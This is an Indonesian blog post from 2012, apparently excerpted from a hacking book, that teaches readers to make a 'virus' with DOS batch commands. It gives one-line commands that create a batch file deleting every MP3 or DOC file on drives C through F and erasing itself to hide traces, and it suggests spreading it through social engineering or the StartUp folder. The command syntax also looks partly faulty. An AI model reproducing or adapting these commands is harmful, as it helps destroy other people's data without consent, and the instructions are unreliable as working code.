Kamis, 30 Agustus 2012

Membuat Virus dengan DOS

Sebenarnya saya tidak bergitu tertarik membahas tema yang satu  ini. Karena cenderung bersifat merusak. Jadinya, saya tidak akan berpanjang lebar dalam bab ini. Ada banyak cara untuk membuat
virus, salah satunya dalam buku ini adalah dengan DOS.

Saya hanya akan memberikan sebuah contoh sangat sederhana dalam pembuatan virus. Efeknya akan menghapus file MP3 yang ada dalam komputer. Sebenarnya saya pernah melihat sebuah virus  penghapus  MP3  yang  dibuat  menggunakan  Visual  Basic, tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu menggunakan banyak-banyak source code.
Bahkan dalam buku ini Anda bisa membuat virus sejenis hanya dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga bisa  mengkreasikannya  untuk  melakukan  aksi  delete  jenis  file lainnya, cuma dengan menggantikan ekstensi file. Anda juga bisa memodifikasi untuk menghapus semua file MP3 dalam seluruh drive atau hanya dalam folder tertentu. 
Yang perlu Anda ketikkan dalam DOS adalah:
echo for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdot.bat

 


Gambar 4.1 virusdos.bat

Maka akan muncul seekor virus yang bernama virus.dot dalam folder yang aktif.
 



Gambar 4.2 File Target

Untuk  menjalankannya,  saya  serahkan  kepada  Anda.  Apakah mau  menggunakan  Social  Engineering,  dipasang  di  StartUp. Semua itu urusan Anda. Saya hanya mengajari cara membuatnya saja.  Sebagai  contoh,  saya  langsung  mengaktifkan  file  virus virusdos.bat tersebut.
Perhatikan, sekarang virus itu telah bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak. 






Gambar 4.3 File target dihapus


Maaf  ya,  saya  cuma  memberikan  satu  itu  saja.  Untuk  modelmodel  lainnya,  pelajari  sendiri.  Khan  saya  sudah  bilang  tidak begitu tertarik dengan bab ini.
Sebagai sedikit bonus, apabila Anda berniat memodifikasi supaya virus  tersebut  dapat  menghapus  dalam  semua  drive,  bentuk syntax-nya adalah:
echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat
Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3.
Sekarang  apabila  berniat  jenis  file  tertentu,  katakanlah  file dokumen (DOC), syntax-nya menjadi:
echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat

Yah, pokoknya pintar-pintar Anda-lah. Saya agak malas mainmain dengan virus. Jadi, sudah segitu aja dulu ya.
 Semoga Bermanfaat ^-^

0 comments:

Posting Komentar